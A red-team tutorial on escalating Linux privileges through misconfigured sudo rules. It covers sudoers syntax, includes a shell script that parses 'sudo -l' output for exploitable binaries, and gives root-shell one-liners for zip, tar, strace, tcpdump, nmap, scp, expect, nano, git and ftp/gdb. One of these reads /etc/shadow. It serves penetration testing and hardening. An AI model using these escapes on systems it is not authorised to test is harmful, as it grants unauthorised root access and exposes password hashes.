Abusing SUDO Advance for Linux Privilege Escalation

Index

  1. What is SUDO?
  2. Scenario
  3. Sudoers File Syntax
  4. Exploiting SUDO
    • zip
    • tar
    • strace
    • tcpdump
    • nmap
    • scp
    • expect
    • nano & pico
    • git
    • ftp/gdb

What is SUDO?

sudo (substitute user and do) lets an administrator delegate privileges to selected users while logging every command run through it. In practice a user can run a command as root (or as another user) by entering their own password rather than root's, or with no password at all, depending on how sudo is configured. The rules that decide whether a request is granted live in /etc/sudoers (and, on most distributions, in the files under /etc/sudoers.d). The file is edited with visudo, which checks the syntax before saving it.


Scenario

During a red team engagement we often land on a host as a low-privileged user and need to escalate to root or to another user. If that user has been granted sudo rights on a binary that can start another program, an attacker can turn that binary into a root shell.


Sudoers File Syntax

root ALL=(ALL) ALL

Explanation 1: The root user can use sudo on ALL hosts, acting as ALL (any) users, and run ALL (any) commands.

The first field is the user (or %group), the second is the host on which the rule applies (a sudoers file is often shared between machines, which is why there is a host field; ALL means every host), the third, in parentheses, is the user(s) the command may be run as, and the last is the list of commands that may be run through sudo. Tags such as NOPASSWD: or NOEXEC: can be placed in front of the command list.

touhid ALL= /sbin/poweroff

Explanation 2: The user touhid can, on any host, run /sbin/poweroff through sudo after entering touhid's own password. No run-as user is given, so sudo's default applies and the command runs as root.

touhid ALL = (root) NOPASSWD: /usr/bin/find

Explanation 3: The user touhid can, on any host, run /usr/bin/find as root without entering a password. Note that find can run arbitrary commands through its -exec option, so a rule like this is already enough for a root shell.


Exploiting SUDO Users

The first step is to find out which commands the current user is allowed to run through sudo:

sudo -l

This lists the sudoers rules that apply to the current user (it may ask for the user's own password, unless a NOPASSWD rule or a recent sudo timestamp covers it). Each privilege line has the form (runas) TAGS: command, command, ...; a rule tagged NOPASSWD: is the most convenient, since no password is needed at all.

In the scenario used for the rest of this post, sudo -l shows that the user may run every binary discussed here as root without a password.

Let's look at those binaries one by one (only the ones listed in the index) and escalate to root with each. All of the tricks below work the same way: the permitted binary is made to execute a child process, which inherits root. A rule tagged NOEXEC: stops the permitted binary from executing other programs and defeats these techniques, so check the tags in the sudo -l output first.
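The enumeration step above and the rule grammar from the Sudoers File Syntax section, as an added shell example that is not code from the original post: it parses sudoers-style rules into their fields, then triages sudo -l output for the binaries covered on this page and marks rules whose NOEXEC tag would block the shell escape. The sample sudo -l output, the host name victim and the user touhid are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original post: parse sudoers-style rules and
# triage "sudo -l" output for binaries that this page shows can spawn a shell.

# Binaries covered on this page (plus find, from the sudoers example above).
ESCAPABLE="zip tar strace tcpdump nmap scp expect nano pico git ftp gdb find"

# parse_rule 'user host=(runas) TAG: cmd, cmd'  ->  user|host|runas|tags|cmds
# Only user-specification lines are handled (not Defaults or alias lines).
# When no (runas) is present the rule runs as root, which is sudo's default.
parse_rule() {
    printf '%s\n' "$1" | awk '
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        eq = index(line, "=")                 # first "=" separates host from spec
        if (eq == 0) { print "invalid"; exit 1 }
        lhs = substr(line, 1, eq - 1)
        rhs = substr(line, eq + 1)
        n = split(lhs, lh, /[ \t]+/)
        user = lh[1]
        host = (n >= 2) ? lh[2] : ""
        sub(/^[ \t]+/, "", rhs)
        runas = "root"
        if (substr(rhs, 1, 1) == "(") {       # optional (runas) list
            cp = index(rhs, ")")
            runas = substr(rhs, 2, cp - 2)
            rhs = substr(rhs, cp + 1)
            sub(/^[ \t]+/, "", rhs)
        }
        tags = ""
        while (match(rhs, /^[A-Z]+:[ \t]*/)) { # NOPASSWD:, NOEXEC:, SETENV: ...
            tag = substr(rhs, RSTART, RLENGTH)
            sub(/:[ \t]*$/, "", tag)
            tags = (tags == "") ? tag : tags "," tag
            rhs = substr(rhs, RLENGTH + 1)
        }
        gsub(/[ \t]*,[ \t]*/, ",", rhs)       # normalise the command list
        print user "|" host "|" runas "|" tags "|" rhs
    }'
}

# flag_escapes 'cmd,cmd,...' prints the entries whose binary is in ESCAPABLE.
# "ALL" is reported as such (any command means any shell); "!cmd" entries
# are negations and grant nothing. Argument restrictions after the path are
# ignored when matching the basename.
flag_escapes() {
    printf '%s\n' "$1" | tr ',' '\n' | while IFS= read -r c; do
        case "$c" in
            ALL) printf 'ALL\n'; continue ;;
            '!'*) continue ;;
            '') continue ;;
        esac
        bin=${c%% *}
        bin=${bin##*/}
        case " $ESCAPABLE " in
            *" $bin "*) printf '%s\n' "$c" ;;
        esac
    done
}

# audit_sudo_l reads "sudo -l" output on stdin. Privilege lines are the ones
# that start with "(runas)"; each is parsed as if it were a sudoers rule.
audit_sudo_l() {
    while IFS= read -r line; do
        trimmed=$(printf '%s' "$line" | sed 's/^[[:space:]]*//')
        case "$trimmed" in '('*) ;; *) continue ;; esac
        spec=$(parse_rule "me ALL=$trimmed")
        runas=$(printf '%s' "$spec" | cut -d'|' -f3)
        tags=$(printf '%s' "$spec" | cut -d'|' -f4)
        cmds=$(printf '%s' "$spec" | cut -d'|' -f5)
        note=""
        case ",$tags," in *,NOEXEC,*) note=" (NOEXEC set: child exec is blocked)" ;; esac
        flag_escapes "$cmds" | while IFS= read -r c; do
            printf 'runas=%s tags=%s cmd=%s%s\n' "$runas" "${tags:-none}" "$c" "$note"
        done
    done
}

# Constructed sample of "sudo -l" output for this example (not real output).
SAMPLE_SUDO_L='Matching Defaults entries for touhid on victim:
    env_reset, mail_badpass

User touhid may run the following commands on victim:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/zip, /usr/bin/nmap
    (root) /bin/systemctl restart nginx
    (ALL) NOEXEC: /usr/bin/tar'

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
```

Run it as a script, or pipe real output into audit_sudo_l with `sudo -l | audit_sudo_l` after sourcing the file. The systemctl line is deliberately not flagged: it is restricted to fixed arguments and is not on this page's list, and the tar line shows why the tags matter, since NOEXEC would stop --checkpoint-action from executing anything.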


Using zip command

zip's -T option tests the archive after writing it, and --unzip-command replaces the unzip invocation used for that test; pointing it at a shell gives a root shell once the archive has been written. /tmp/test must be an existing file so that there is something to archive.

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Using tar command

tar can run a program every time it reaches a checkpoint; with a checkpoint after every record the program runs immediately. The file being archived (testfile here) must exist.

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

Using strace command

strace simply starts the traced program as the sudo target user; sending the trace to /dev/null keeps the terminal clean.

$ sudo strace -o /dev/null /bin/bash

Using tcpdump command

tcpdump's -z runs a post-rotate program on each finished capture file; -G 1 -W 1 makes it rotate after one second and stop after one file, and -Z root keeps tcpdump running as root instead of dropping privileges before that program is executed. The script runs non-interactively, so its output is what you get back, and at least one packet has to arrive on the interface for the rotation to trigger.

$ printf '#!/bin/sh\nid\ncat /etc/shadow\n' > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

Using nmap command

nmap's --script loads an NSE script, and NSE scripts are Lua, so the script can simply call os.execute:

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse

Using scp command

-S names the program scp uses in place of ssh. Point it at an executable script of your own that starts a shell, and give the destination a trailing colon so scp treats it as remote and actually invokes that program (without the colon scp performs a plain local copy and never runs it). scp talks to its "ssh" over pipes, so the script should attach the shell to the terminal, for example by redirecting the shell's stdin and stdout to stderr.

$ sudo scp -S /path/yourscript x y:

Using expect command

expect is a Tcl interpreter: spawn starts a program and interact hands the terminal over to it.

$ sudo expect -c 'spawn /bin/sh; interact'

Using nano (or pico) command

-s sets the spell-checker program. nano writes the buffer to a temporary file and, on CTRL+T, runs that program on it, so the buffer is executed by bash as a script. Typing /bin/bash as the buffer contents therefore gives an interactive root shell.

$ sudo nano -s /bin/bash

type your command into the buffer and hit CTRL+T

Using git command

git help opens the manual page in a pager (less by default), and less runs a shell command when a line starts with !:

$ sudo git help status

at the pager prompt type: !/bin/bash

Using ftp/gdb command

Both ftp and gdb are interactive programs with a shell escape: a line beginning with ! runs the rest of the line through the shell. The same input works at the (gdb) prompt.

$ sudo ftp

type: !/bin/sh
